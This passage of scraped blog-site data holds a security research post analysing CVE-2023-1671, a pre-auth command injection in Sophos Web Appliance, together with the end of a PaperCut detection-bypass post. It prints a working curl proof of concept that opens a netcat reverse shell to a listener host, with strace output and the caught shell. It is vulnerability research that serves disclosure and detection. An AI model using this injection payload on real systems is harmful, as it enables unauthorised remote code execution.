detections discussed earlier.",[18,99828,99829],{},"Importantly, because this approach doesn’t use a scripting interface, this attack also doesn’t generate the expected log entries. An attack using the “User\u002FGroup” custom program will generate logs that look more like this:",[1354,99831,99834],{"className":99832,"code":99833,"language":1359},[1357],"User\u002FGroup Sync settings changed by \"admin\"\nUser \"admin\" logged into the administration interface.\n",[886,99835,99833],{"__ignoreMap":219},[18,99837,99838],{},"The full result is that we can establish reverse shells on both Windows and Linux targets without triggering any detections.",[33917,99840],{"id":99841,"title":83462},"NTYQaZsFxiI",[1920,99843,1903],{"id":1902},[18,99845,99846],{},"An administrative user attacking PaperCut NG and MF can follow multiple paths to arbitrary code execution. Detections that focus on one particular code execution method, or that focus on a small subset of techniques used by one threat actor are doomed to be useless in the next round of attacks. Attackers learn from defenders' public detections, so it’s the defenders’ responsibility to produce robust detections that aren’t easily bypassed.",[2901,99848,99849],{},"html pre.shiki code .ss--_, html code.shiki .ss--_{--shiki-light:#90A4AE;--shiki-default:#24292E;--shiki-dark:#E1E4E8;--shiki-sepia:#F8F8F2}html pre.shiki code .swvn1, html code.shiki .swvn1{--shiki-light:#39ADB5;--shiki-default:#24292E;--shiki-dark:#E1E4E8;--shiki-sepia:#F8F8F2}html pre.shiki code .sD0ED, html code.shiki .sD0ED{--shiki-light:#6182B8;--shiki-default:#6F42C1;--shiki-dark:#B392F0;--shiki-sepia:#A6E22E}html pre.shiki code .siCPE, html code.shiki .siCPE{--shiki-light:#39ADB5;--shiki-default:#032F62;--shiki-dark:#9ECBFF;--shiki-sepia:#E6DB74}html pre.shiki code .sLACW, html code.shiki .sLACW{--shiki-light:#91B859;--shiki-default:#032F62;--shiki-dark:#9ECBFF;--shiki-sepia:#E6DB74}html pre.shiki code .sQeA1, html code.shiki .sQeA1{--shiki-light:#90A4AE;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#AE81FF}html .light .shiki span {color: var(--shiki-light);background: var(--shiki-light-bg);font-style: var(--shiki-light-font-style);font-weight: var(--shiki-light-font-weight);text-decoration: var(--shiki-light-text-decoration);}html.light .shiki span {color: var(--shiki-light);background: var(--shiki-light-bg);font-style: var(--shiki-light-font-style);font-weight: var(--shiki-light-font-weight);text-decoration: var(--shiki-light-text-decoration);}html .default .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}html.dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}html .sepia .shiki span {color: var(--shiki-sepia);background: var(--shiki-sepia-bg);font-style: var(--shiki-sepia-font-style);font-weight: var(--shiki-sepia-font-weight);text-decoration: var(--shiki-sepia-text-decoration);}html.sepia .shiki span {color: var(--shiki-sepia);background: var(--shiki-sepia-bg);font-style: var(--shiki-sepia-font-style);font-weight: var(--shiki-sepia-font-weight);text-decoration: var(--shiki-sepia-text-decoration);}html pre.shiki code .sR7ES, html code.shiki .sR7ES{--shiki-light:#E2931D;--shiki-default:#6F42C1;--shiki-dark:#B392F0;--shiki-sepia:#A6E22E}html pre.shiki code .sYThS, html code.shiki .sYThS{--shiki-light:#F76D47;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#AE81FF}html pre.shiki code .sFhLe, html code.shiki .sFhLe{--shiki-light:#91B859;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#AE81FF}html pre.shiki code .sGXK2, html code.shiki .sGXK2{--shiki-light:#39ADB5;--shiki-default:#D73A49;--shiki-dark:#F97583;--shiki-sepia:#F92672}html pre.shiki code .sQgqH, html code.shiki .sQgqH{--shiki-light:#90A4AE;--shiki-light-font-style:italic;--shiki-default:#E36209;--shiki-default-font-style:inherit;--shiki-dark:#FFAB70;--shiki-dark-font-style:inherit;--shiki-sepia:#FD971F;--shiki-sepia-font-style:italic}",{"title":219,"searchDepth":220,"depth":220,"links":99851},[99852,99853,99854,99858],{"id":98770,"depth":220,"text":98771},{"id":84830,"depth":220,"text":84831},{"id":98954,"depth":220,"text":98955,"children":99855},[99856,99857],{"id":98972,"depth":1266,"text":98973},{"id":99036,"depth":1266,"text":99037},{"id":99052,"depth":220,"text":99053},"Public exploits and detections for CVE-2023-27350 focus on code execution using the PaperCut print scripting interface. In this blog, VulnCheck shares a new code execution vector and demonstrates how existing detections aren't robust enough to flag the new activity.",{"slug":99861},"papercut-rce","\u002Fblog\u002Fpapercut-rce",{"title":83462,"description":99859},"blog\u002Fpapercut-rce",[242],"-QeLVvdXgVrllkIRUlvLs5jLckg2JP6wSS-FreeE9uw",{"id":99868,"title":99869,"articles":99870,"authors":99877,"body":99883,"date":100720,"description":100721,"extension":234,"image":7,"link":7,"meta":100722,"navigation":237,"path":100724,"seo":100725,"series":7,"stem":100726,"subtype":7,"tags":100727,"__hash__":100728},"blog\u002Fblog\u002Fcve-2023-1671-analysis.md","Analysis of Pre-Auth RCE in Sophos Web Appliance (CVE-2023-1671) VulnCheck",[99871,99874],{"title":99872,"source":3494,"link":99873,"date":61690},"UK GovAssure program to run annual security audits on government departments","https:\u002F\u002Friskybiznews.substack.com\u002Fp\u002Frisky-biz-news-uk-govassure-program",{"title":99875,"source":23286,"link":99876,"date":81109},"Rust Won’t Save Us: An Analysis of 2023’s Known Exploited Vulnerabilities","https:\u002F\u002Fsecurityboulevard.com\u002F2024\u002F02\u002Frust-wont-save-us-an-analysis-of-2023s-known-exploited-vulnerabilities\u002F",[99878],{"name":99879,"avatar":99880,"link":99881,"linkName":99882},"William Vu","\u002Favatars\u002Fwvu.jpg","https:\u002F\u002Ftwitter.com\u002Fwvuuuuuuuuuuuuu","@wvuuuuuuuuuuuuu",{"type":15,"value":99884,"toc":100717},[99885,99902,99907,99914,99918,99921,99934,99937,99941,99955,100013,100024,100550,100561,100565,100587,100596,100606,100646,100664,100672,100677,100681,100688,100694,100700,100702,100704,100714],[18,99886,99887,99888,99890,99891,99896,99897,4606],{},"On April 4, 2023, Sophos published a security advisory",[47,99889,467],{"href":36220}," for their Web Appliance product. The advisory includes information on ",[47,99892,99895],{"href":99893,"rel":99894},"https:\u002F\u002Fnvd.nist.gov\u002Fvuln\u002Fdetail\u002FCVE-2023-1671",[51],"CVE-2023-1671",", a critical vulnerability in versions prior to ",[47,99898,99901],{"href":99899,"rel":99900},"https:\u002F\u002Fwsa.sophos.com\u002Fdocs\u002Fws1000\u002Fws1000\u002Fconcepts\u002FReleaseNotes_4.3.10.4.html",[51],"4.3.10.4",[1925,99903,99904],{},[18,99905,99906],{},"A pre-auth command injection vulnerability in the warn-proceed handler allowing execution of arbitrary code was discovered and responsibly disclosed to Sophos by an external security researcher via the Sophos bug bounty program.",[18,99908,99909,99910,99913],{},"Given the ",[47,99911,2942],{"href":45535,"rel":99912},[51]," nature of the vulnerability, VulnCheck decided to investigate.",[1920,99915,99917],{"id":99916},"bluf-mass-exploitation-unlikely","BLUF: Mass Exploitation Unlikely",[18,99919,99920],{},"The notes in the advisory detail the caveats quite well:",[1925,99922,99923],{},[22,99924,99925,99928,99931],{},[25,99926,99927],{},"End of Life date for Sophos Web Appliance is on July 20, 2023",[25,99929,99930],{},"Sophos recommends that Sophos Web Appliance is protected by a firewall and not accessible via the public Internet",[25,99932,99933],{},"There is no action required for Sophos Web Appliance customers, as updates are installed automatically by default",[18,99935,99936],{},"Consequently, exploitation at scale is highly unlikely.",[1920,99938,99940],{"id":99939},"analyzing-the-patch","Analyzing the Patch",[18,99942,99943,99946,99947,99950,99951,99954],{},[886,99944,99945],{},"\u002Fopt\u002Fws\u002Fbin\u002Fftsblistpack"," is a Perl script that shells out to ",[886,99948,99949],{},"\u002Fopt\u002Fws\u002Fbin\u002Fsblistpack",", which is another Perl script. The patch changes the ",[886,99952,99953],{},"system"," function's invocation such that the shell is no longer invoked:",[1354,99956,99959],{"className":99957,"code":99958,"language":11815,"meta":219,"style":219},"language-diff shiki shiki-themes material-theme-lighter github-light github-dark monokai","--- unpatched\u002Fopt\u002Fws\u002Fbin\u002Fftsblistpack 2022-04-08 20:38:49.000000000 -0500\n+++ patched\u002Fopt\u002Fws\u002Fbin\u002Fftsblistpack 2023-03-24 17:08:26.000000000 -0500\n@@ -25,7 +25,7 @@\n open my $flag, \">\", \"$flag_file_dir\u002F$proceeded_flag_file\" or die \"Open file [$flag_file_dir\u002F$proceeded_flag_file] failed\" and $rc++;\n close($flag);\n\n- $rc += system(\"$sblistpack '$uri' '$user' '$filetype' '$filein' '$fileout'\");\n+ $rc += system($sblistpack, $uri, $user, $filetype, $filein, $fileout);\n }\n\n exit $rc;\n",[886,99960,99961,99966,99971,99976,99981,99986,99990,99995,100000,100004,100008],{"__ignoreMap":219},[1373,99962,99963],{"class":1375,"line":1376},[1373,99964,99965],{},"--- unpatched\u002Fopt\u002Fws\u002Fbin\u002Fftsblistpack 2022-04-08 20:38:49.000000000 -0500\n",[1373,99967,99968],{"class":1375,"line":220},[1373,99969,99970],{},"+++ patched\u002Fopt\u002Fws\u002Fbin\u002Fftsblistpack 2023-03-24 17:08:26.000000000 -0500\n",[1373,99972,99973],{"class":1375,"line":1266},[1373,99974,99975],{},"@@ -25,7 +25,7 @@\n",[1373,99977,99978],{"class":1375,"line":1852},[1373,99979,99980],{}," open my $flag, \">\", \"$flag_file_dir\u002F$proceeded_flag_file\" or die \"Open file [$flag_file_dir\u002F$proceeded_flag_file] failed\" and $rc++;\n",[1373,99982,99983],{"class":1375,"line":4692},[1373,99984,99985],{}," close($flag);\n",[1373,99987,99988],{"class":1375,"line":4724},[1373,99989,6520],{"emptyLinePlaceholder":237},[1373,99991,99992],{"class":1375,"line":4756},[1373,99993,99994],{},"- $rc += system(\"$sblistpack '$uri' '$user' '$filetype' '$filein' '$fileout'\");\n",[1373,99996,99997],{"class":1375,"line":4768},[1373,99998,99999],{},"+ $rc += system($sblistpack, $uri, $user, $filetype, $filein, $fileout);\n",[1373,100001,100002],{"class":1375,"line":4792},[1373,100003,35334],{},[1373,100005,100006],{"class":1375,"line":4798},[1373,100007,6520],{"emptyLinePlaceholder":237},[1373,100009,100010],{"class":1375,"line":4806},[1373,100011,100012],{}," exit $rc;\n",[18,100014,100015,100016,100019,100020,100023],{},"Note the single-quoted arguments to the shell command in the unpatched code. This will be important later. Tracing from sink to source, we can see that ",[886,100017,100018],{},"\u002Fopt\u002Fui\u002Fapache\u002Fhtdocs\u002Fcontrollers\u002FUsrBlocked.php"," shells out to ",[886,100021,100022],{},"ftsblistpack"," with user-supplied parameters:",[1354,100025,100027],{"className":1367,"code":100026,"language":1369,"meta":219,"style":219}," if($_GET['action'] == 'continue') {\n\n if(strlen(trim($_POST['user'])) > 0)\n $user = base64_decode($_POST['user_encoded']);\n else\n $user = $_POST['client-ip'];\n if($user == '-') $user = $_POST['client-ip'];\n $user = escapeshellarg($user);\n\u002F\u002Fsnip\n \u002F\u002F use sblistpack to allow access\n if($_POST['args_reason'] == 'filetypewarn') {\n $key = $_POST['url'];\n $packer = '\u002Fopt\u002Fws\u002Fbin\u002Fftsblistpack';\n $value = $_POST['filetype'];\n }\n else {\n $key = $_POST['domain'];\n $packer = '\u002Fopt\u002Fws\u002Fbin\u002Fsblistpack';\n $catParts = explode(\"|\",$_POST['raw_category_id']);\n $value = $catParts[0];\n }\n\n $key = escapeshellarg($key);\n $value = escapeshellarg($value);\n $this->log->write(\"DEBUG\",\"cmd = '$packer $key $user $value'\");\n $result = shell_exec(\"$packer $key $user $value 2>&1\");\n",[886,100028,100029,100062,100066,100100,100128,100132,100155,100193,100211,100216,100221,100253,100277,100294,100318,100322,100329,100352,100368,100402,100421,100425,100429,100445,100461,100512],{"__ignoreMap":219},[1373,100030,100031,100033,100035,100038,100040,100042,100045,100047,100049,100051,100053,100056,100058,100060],{"class":1375,"line":1376},[1373,100032,9773],{"class":4636},[1373,100034,34467],{"class":1383},[1373,100036,100037],{"class":4640},"_GET",[1373,100039,7035],{"class":1383},[1373,100041,1388],{"class":1387},[1373,100043,100044],{"class":1391},"action",[1373,100046,1388],{"class":1387},[1373,100048,15050],{"class":1383},[1373,100050,16406],{"class":1397},[1373,100052,4713],{"class":1387},[1373,100054,100055],{"class":1391},"continue",[1373,100057,1388],{"class":1387},[1373,100059,2230],{"class":1383},[1373,100061,4765],{"class":1383},[1373,100063,100064],{"class":1375,"line":220},[1373,100065,6520],{"emptyLinePlaceholder":237},[1373,100067,100068,100070,100072,100075,100077,100079,100081,100084,100086,100088,100090,100092,100094,100096,100098],{"class":1375,"line":1266},[1373,100069,15824],{"class":4636},[1373,100071,1384],{"class":1383},[1373,100073,100074],{"class":1379},"strlen",[1373,100076,1384],{"class":1383},[1373,100078,35140],{"class":1379},[1373,100080,34467],{"class":1383},[1373,100082,100083],{"class":4640},"_POST",[1373,100085,7035],{"class":1383},[1373,100087,1388],{"class":1387},[1373,100089,39933],{"class":1391},[1373,100091,1388],{"class":1387},[1373,100093,47955],{"class":1383},[1373,100095,11741],{"class":1397},[1373,100097,5557],{"class":5467},[1373,100099,11875],{"class":1383},[1373,100101,100102,100105,100108,100110,100113,100115,100117,100119,100121,100124,100126],{"class":1375,"line":1852},[1373,100103,100104],{"class":1383}," $",[1373,100106,100107],{"class":4640},"user ",[1373,100109,5417],{"class":1397},[1373,100111,100112],{"class":1379}," base64_decode",[1373,100114,34467],{"class":1383},[1373,100116,100083],{"class":4640},[1373,100118,7035],{"class":1383},[1373,100120,1388],{"class":1387},[1373,100122,100123],{"class":1391},"user_encoded",[1373,100125,1388],{"class":1387},[1373,100127,34850],{"class":1383},[1373,100129,100130],{"class":1375,"line":4692},[1373,100131,15948],{"class":4636},[1373,100133,100134,100136,100138,100140,100142,100144,100146,100148,100151,100153],{"class":1375,"line":4724},[1373,100135,100104],{"class":1383},[1373,100137,100107],{"class":4640},[1373,100139,5417],{"class":1397},[1373,100141,4656],{"class":1383},[1373,100143,100083],{"class":4640},[1373,100145,7035],{"class":1383},[1373,100147,1388],{"class":1387},[1373,100149,100150],{"class":1391},"client-ip",[1373,100152,1388],{"class":1387},[1373,100154,34699],{"class":1383},[1373,100156,100157,100159,100161,100163,100165,100167,100169,100171,100173,100175,100177,100179,100181,100183,100185,100187,100189,100191],{"class":1375,"line":4756},[1373,100158,15824],{"class":4636},[1373,100160,34467],{"class":1383},[1373,100162,100107],{"class":4640},[1373,100164,15920],{"class":1397},[1373,100166,4713],{"class":1387},[1373,100168,61062],{"class":1391},[1373,100170,1388],{"class":1387},[1373,100172,2230],{"class":1383},[1373,100174,4656],{"class":1383},[1373,100176,100107],{"class":4640},[1373,100178,5417],{"class":1397},[1373,100180,4656],{"class":1383},[1373,100182,100083],{"class":4640},[1373,100184,7035],{"class":1383},[1373,100186,1388],{"class":1387},[1373,100188,100150],{"class":1391},[1373,100190,1388],{"class":1387},[1373,100192,34699],{"class":1383},[1373,100194,100195,100198,100200,100202,100205,100207,100209],{"class":1375,"line":4768},[1373,100196,100197],{"class":1383}," $",[1373,100199,100107],{"class":4640},[1373,100201,5417],{"class":1397},[1373,100203,100204],{"class":1379}," escapeshellarg",[1373,100206,34467],{"class":1383},[1373,100208,39933],{"class":4640},[1373,100210,4680],{"class":1383},[1373,100212,100213],{"class":1375,"line":4792},[1373,100214,100215],{"class":4630},"\u002F\u002Fsnip\n",[1373,100217,100218],{"class":1375,"line":4798},[1373,100219,100220],{"class":4630}," \u002F\u002F use sblistpack to allow access\n",[1373,100222,100223,100225,100227,100229,100231,100233,100236,100238,100240,100242,100244,100247,100249,100251],{"class":1375,"line":4806},[1373,100224,16106],{"class":4636},[1373,100226,34467],{"class":1383},[1373,100228,100083],{"class":4640},[1373,100230,7035],{"class":1383},[1373,100232,1388],{"class":1387},[1373,100234,100235],{"class":1391},"args_reason",[1373,100237,1388],{"class":1387},[1373,100239,15050],{"class":1383},[1373,100241,16406],{"class":1397},[1373,100243,4713],{"class":1387},[1373,100245,100246],{"class":1391},"filetypewarn",[1373,100248,1388],{"class":1387},[1373,100250,2230],{"class":1383},[1373,100252,4765],{"class":1383},[1373,100254,100255,100258,100261,100263,100265,100267,100269,100271,100273,100275],{"class":1375,"line":4817},[1373,100256,100257],{"class":1383}," $",[1373,100259,100260],{"class":4640},"key ",[1373,100262,5417],{"class":1397},[1373,100264,4656],{"class":1383},[1373,100266,100083],{"class":4640},[1373,100268,7035],{"class":1383},[1373,100270,1388],{"class":1387},[1373,100272,7585],{"class":1391},[1373,100274,1388],{"class":1387},[1373,100276,34699],{"class":1383},[1373,100278,100279,100281,100284,100286,100288,100290,100292],{"class":1375,"line":4825},[1373,100280,100257],{"class":1383},[1373,100282,100283],{"class":4640},"packer ",[1373,100285,5417],{"class":1397},[1373,100287,4713],{"class":1387},[1373,100289,99945],{"class":1391},[1373,100291,1388],{"class":1387},[1373,100293,4912],{"class":1383},[1373,100295,100296,100298,100301,100303,100305,100307,100309,100311,100314,100316],{"class":1375,"line":4835},[1373,100297,100257],{"class":1383},[1373,100299,100300],{"class":4640},"value ",[1373,100302,5417],{"class":1397},[1373,100304,4656],{"class":1383},[1373,100306,100083],{"class":4640},[1373,100308,7035],{"class":1383},[1373,100310,1388],{"class":1387},[1373,100312,100313],{"class":1391},"filetype",[1373,100315,1388],{"class":1387},[1373,100317,34699],{"class":1383},[1373,100319,100320],{"class":1375,"line":4843},[1373,100321,16207],{"class":1383},[1373,100323,100324,100327],{"class":1375,"line":4849},[1373,100325,100326],{"class":4636}," else",[1373,100328,4765],{"class":1383},[1373,100330,100331,100333,100335,100337,100339,100341,100343,100345,100348,100350],{"class":1375,"line":4877},[1373,100332,100257],{"class":1383},[1373,100334,100260],{"class":4640},[1373,100336,5417],{"class":1397},[1373,100338,4656],{"class":1383},[1373,100340,100083],{"class":4640},[1373,100342,7035],{"class":1383},[1373,100344,1388],{"class":1387},[1373,100346,100347],{"class":1391},"domain",[1373,100349,1388],{"class":1387},[1373,100351,34699],{"class":1383},[1373,100353,100354,100356,100358,100360,100362,100364,100366],{"class":1375,"line":4915},[1373,100355,100257],{"class":1383},[1373,100357,100283],{"class":4640},[1373,100359,5417],{"class":1397},[1373,100361,4713],{"class":1387},[1373,100363,99949],{"class":1391},[1373,100365,1388],{"class":1387},[1373,100367,4912],{"class":1383},[1373,100369,100370,100372,100375,100377,100379,100381,100383,100385,100387,100389,100391,100393,100395,100398,100400],{"class":1375,"line":4931},[1373,100371,100257],{"class":1383},[1373,100373,100374],{"class":4640},"catParts ",[1373,100376,5417],{"class":1397},[1373,100378,93923],{"class":1379},[1373,100380,1384],{"class":1383},[1373,100382,183],{"class":1387},[1373,100384,17472],{"class":1391},[1373,100386,183],{"class":1387},[1373,100388,47335],{"class":1383},[1373,100390,100083],{"class":4640},[1373,100392,7035],{"class":1383},[1373,100394,1388],{"class":1387},[1373,100396,100397],{"class":1391},"raw_category_id",[1373,100399,1388],{"class":1387},[1373,100401,34850],{"class":1383},[1373,100403,100404,100406,100408,100410,100412,100415,100417,100419],{"class":1375,"line":4947},[1373,100405,100257],{"class":1383},[1373,100407,100300],{"class":4640},[1373,100409,5417],{"class":1397},[1373,100411,4656],{"class":1383},[1373,100413,100414],{"class":4640},"catParts",[1373,100416,7035],{"class":1383},[1373,100418,445],{"class":5467},[1373,100420,34699],{"class":1383},[1373,100422,100423],{"class":1375,"line":4952},[1373,100424,16207],{"class":1383},[1373,100426,100427],{"class":1375,"line":6776},[1373,100428,6520],{"emptyLinePlaceholder":237},[1373,100430,100431,100433,100435,100437,100439,100441,100443],{"class":1375,"line":6781},[1373,100432,100104],{"class":1383},[1373,100434,100260],{"class":4640},[1373,100436,5417],{"class":1397},[1373,100438,100204],{"class":1379},[1373,100440,34467],{"class":1383},[1373,100442,13937],{"class":4640},[1373,100444,4680],{"class":1383},[1373,100446,100447,100449,100451,100453,100455,100457,100459],{"class":1375,"line":7524},[1373,100448,100104],{"class":1383},[1373,100450,100300],{"class":4640},[1373,100452,5417],{"class":1397},[1373,100454,100204],{"class":1379},[1373,100456,34467],{"class":1383},[1373,100458,85021],{"class":4640},[1373,100460,4680],{"class":1383},[1373,100462,100463,100466,100468,100470,100472,100474,100476,100478,100480,100482,100484,100486,100489,100491,100494,100496,100498,100500,100502,100504,100506,100508,100510],{"class":1375,"line":7530},[1373,100464,100465],{"class":34505}," $this",[1373,100467,4667],{"class":1397},[1373,100469,19064],{"class":4640},[1373,100471,4667],{"class":1397},[1373,100473,75355],{"class":7297},[1373,100475,1384],{"class":1383},[1373,100477,183],{"class":1387},[1373,100479,67201],{"class":1391},[1373,100481,183],{"class":1387},[1373,100483,5437],{"class":1383},[1373,100485,183],{"class":1387},[1373,100487,100488],{"class":1391},"cmd = '",[1373,100490,4644],{"class":1383},[1373,100492,100493],{"class":4640},"packer",[1373,100495,4656],{"class":1383},[1373,100497,13937],{"class":4640},[1373,100499,4656],{"class":1383},[1373,100501,39933],{"class":4640},[1373,100503,4656],{"class":1383},[1373,100505,85021],{"class":4640},[1373,100507,1388],{"class":1391},[1373,100509,183],{"class":1387},[1373,100511,4680],{"class":1383},[1373,100513,100514,100516,100519,100521,100523,100525,100527,100529,100531,100533,100535,100537,100539,100541,100543,100546,100548],{"class":1375,"line":7546},[1373,100515,100104],{"class":1383},[1373,100517,100518],{"class":4640},"result ",[1373,100520,5417],{"class":1397},[1373,100522,2366],{"class":1379},[1373,100524,1384],{"class":1383},[1373,100526,183],{"class":1387},[1373,100528,4644],{"class":1383},[1373,100530,100493],{"class":4640},[1373,100532,4656],{"class":1383},[1373,100534,13937],{"class":4640},[1373,100536,4656],{"class":1383},[1373,100538,39933],{"class":4640},[1373,100540,4656],{"class":1383},[1373,100542,85021],{"class":4640},[1373,100544,100545],{"class":1391}," 2>&1",[1373,100547,183],{"class":1387},[1373,100549,4680],{"class":1383},[18,100551,100552,100553,100556,100557,100560],{},"Note that user-controlled input is still processed through PHP's ",[886,100554,100555],{},"escapeshellarg"," function, which will escape ",[1131,100558,100559],{},"and add"," single quotes to a shell argument. You may be able to see where this is going.",[1920,100562,100564],{"id":100563},"developing-an-rce-poc","Developing an RCE PoC",[18,100566,100567,100568,100571,100572,100575,100576,982,100578,100580,100581,100583,100584,100586],{},"Exploitation is relatively straightforward. ",[886,100569,100570],{},"UsrBlocked.php"," is routed through ",[886,100573,100574],{},"\u002Findex.php?c=blocked",", and the required ",[886,100577,6284],{},[886,100579,6946],{}," parameters are supplied thereafter. Since the ",[886,100582,100123],{}," parameter is Base64-encoded, it's perfect for our command injection. No escaping or other encoding is necessary! The full ",[886,100585,1557],{}," command to RCE is demonstrated below:",[100588,100589,100590],"shell-prompt",{},[1354,100591,100594],{"className":100592,"code":100593,"language":1359,"meta":219},[1357],"wvu@kharak:~$ curl -k --trace-ascii % \"https:\u002F\u002F192.168.56.108\u002Findex.php?c=blocked&action=continue\" -d \"args_reason=filetypewarn&url=$RANDOM&filetype=$RANDOM&user=$RANDOM&user_encoded=$(echo -n \"';nc -e \u002Fbin\u002Fsh 192.168.56.1 4444 #\" | base64)\"\n#snip\n=> Send header, 184 bytes (0xb8)\n0000: POST \u002Findex.php?c=blocked&action=continue HTTP\u002F1.1\n0034: Host: 192.168.56.108\n004a: User-Agent: curl\u002F7.88.1\n0063: Accept: *\u002F*\n0070: Content-Length: 120\n0085: Content-Type: application\u002Fx-www-form-urlencoded\n00b6:\n=> Send data, 120 bytes (0x78)\n0000: args_reason=filetypewarn&url=16625&filetype=5831&user=4525&user_\n0040: encoded=JztuYyAtZSAvYmluL3NoIDE5Mi4xNjguNTYuMSA0NDQ0ICM=\n",[886,100595,100593],{"__ignoreMap":219},[18,100597,100598,100599,100602,100603,50357],{},"How ",[1131,100600,100601],{},"exactly"," the command injection works is perhaps best illustrated by the following ",[886,100604,100605],{},"strace",[1354,100607,100609],{"className":92494,"code":100608,"language":28578,"meta":219,"style":219},"[pid 22283] execve(\"\u002Fbin\u002Fsh\", [\"sh\", \"-c\", \"\u002Fopt\u002Fws\u002Fbin\u002Fftsblistpack '16625' ''\\\\'';nc -e \u002Fbin\u002Fsh 192.168.56.1 4444 #' '5831' 2>&1\"], [\u002F* 16 vars *\u002F]) = 0\n[pid 22284] execve(\"\u002Fopt\u002Fws\u002Fbin\u002Fftsblistpack\", [\"\u002Fopt\u002Fws\u002Fbin\u002Fftsblistpack\", \"16625\", \"';nc -e \u002Fbin\u002Fsh 192.168.56.1 4444 #\", \"5831\"], [\u002F* 16 vars *\u002F]) = 0\n[pid 22285] execve(\"\u002Fbin\u002Fsh\", [\"sh\", \"-c\", \"\u002Fopt\u002Fws\u002Fbin\u002Fsblistpack '16625' '';nc -e \u002Fbin\u002Fsh 192.168.56.1 4444 #' '5831' '\u002Fpersist\u002Fwsa\u002Fftsblist.in' '\u002Fpersist\u002Fwsa\u002Fftsblist.kvlist'\"], [\u002F* 16 vars *\u002F]) = 0\n[pid 22288] execve(\"\u002Fopt\u002Fws\u002Fbin\u002Fsblistpack\", [\"\u002Fopt\u002Fws\u002Fbin\u002Fsblistpack\", \"16625\", \"\"], [\u002F* 16 vars *\u002F]) = 0\n[pid 22285] --- SIGCHLD (Child exited) @ 0 (0) ---\n[pid 22299] execve(\"\u002Fbin\u002Fnc\", [\"nc\", \"-e\", \"\u002Fbin\u002Fsh\", \"192.168.56.1\", \"4444\"], [\u002F* 16 vars *\u002F]) = 0\n[pid 22299] execve(\"\u002Fbin\u002Fsh\", [\"sh\"], [\u002F* 16 vars *\u002F]) = 0\n",[886,100610,100611,100616,100621,100626,100631,100636,100641],{"__ignoreMap":219},[1373,100612,100613],{"class":1375,"line":1376},[1373,100614,100615],{},"[pid 22283] execve(\"\u002Fbin\u002Fsh\", [\"sh\", \"-c\", \"\u002Fopt\u002Fws\u002Fbin\u002Fftsblistpack '16625' ''\\\\'';nc -e \u002Fbin\u002Fsh 192.168.56.1 4444 #' '5831' 2>&1\"], [\u002F* 16 vars *\u002F]) = 0\n",[1373,100617,100618],{"class":1375,"line":220},[1373,100619,100620],{},"[pid 22284] execve(\"\u002Fopt\u002Fws\u002Fbin\u002Fftsblistpack\", [\"\u002Fopt\u002Fws\u002Fbin\u002Fftsblistpack\", \"16625\", \"';nc -e \u002Fbin\u002Fsh 192.168.56.1 4444 #\", \"5831\"], [\u002F* 16 vars *\u002F]) = 0\n",[1373,100622,100623],{"class":1375,"line":1266},[1373,100624,100625],{},"[pid 22285] execve(\"\u002Fbin\u002Fsh\", [\"sh\", \"-c\", \"\u002Fopt\u002Fws\u002Fbin\u002Fsblistpack '16625' '';nc -e \u002Fbin\u002Fsh 192.168.56.1 4444 #' '5831' '\u002Fpersist\u002Fwsa\u002Fftsblist.in' '\u002Fpersist\u002Fwsa\u002Fftsblist.kvlist'\"], [\u002F* 16 vars *\u002F]) = 0\n",[1373,100627,100628],{"class":1375,"line":1852},[1373,100629,100630],{},"[pid 22288] execve(\"\u002Fopt\u002Fws\u002Fbin\u002Fsblistpack\", [\"\u002Fopt\u002Fws\u002Fbin\u002Fsblistpack\", \"16625\", \"\"], [\u002F* 16 vars *\u002F]) = 0\n",[1373,100632,100633],{"class":1375,"line":4692},[1373,100634,100635],{},"[pid 22285] --- SIGCHLD (Child exited) @ 0 (0) ---\n",[1373,100637,100638],{"class":1375,"line":4724},[1373,100639,100640],{},"[pid 22299] execve(\"\u002Fbin\u002Fnc\", [\"nc\", \"-e\", \"\u002Fbin\u002Fsh\", \"192.168.56.1\", \"4444\"], [\u002F* 16 vars *\u002F]) = 0\n",[1373,100642,100643],{"class":1375,"line":4756},[1373,100644,100645],{},"[pid 22299] execve(\"\u002Fbin\u002Fsh\", [\"sh\"], [\u002F* 16 vars *\u002F]) = 0\n",[18,100647,100648,100649,100652,100653,100655,100656,100659,100660,100663],{},"When ",[886,100650,100651],{},"';nc -e \u002Fbin\u002Fsh 192.168.56.1 4444 #"," is injected into ",[886,100654,100022],{},", the input is wrapped in single quotes, resulting in the \"sanitized\" input ",[886,100657,100658],{},"'';nc -e \u002Fbin\u002Fsh 192.168.56.1 4444 #'",", which will close the opening quote, execute a ",[886,100661,100662],{},"netcat"," reverse shell, and comment out the rest of the command line. If you had a listener set up, you'd catch the shell:",[100588,100665,100666],{},[1354,100667,100670],{"className":100668,"code":100669,"language":1359,"meta":219},[1357],"wvu@kharak:~$ rlwrap -rS '$ ' -nH \u002Fdev\u002Fnull ncat -lkv 4444\nNcat: Version 7.93 ( https:\u002F\u002Fnmap.org\u002Fncat )\nNcat: Listening on :::4444\nNcat: Listening on 0.0.0.0:4444\n$ Ncat: Connection from 192.168.56.108.\nNcat: Connection from 192.168.56.108:56426.\n$ id\nuid=1000(spiderman) gid=1000(spiderman) groups=1000(spiderman),16(cron),44(tproxyd),45(wdx)\n$ uname -a\nLinux foo 3.2.89 #1 SMP Tue Mar 29 00:03:09 UTC 2022 i686 GNU\u002FLinux\n$\n",[886,100671,100669],{"__ignoreMap":219},[18,100673,100674],{},[1131,100675,100676],{},"Insert Spider-Man Pointing meme.",[1920,100678,100680],{"id":100679},"hunting-for-iocs","Hunting for IOCs",[18,100682,100683,100684,100687],{},"A single line is appended to the ",[886,100685,100686],{},"\u002Flog\u002Fui_access_log"," file once the HTTP request returns a 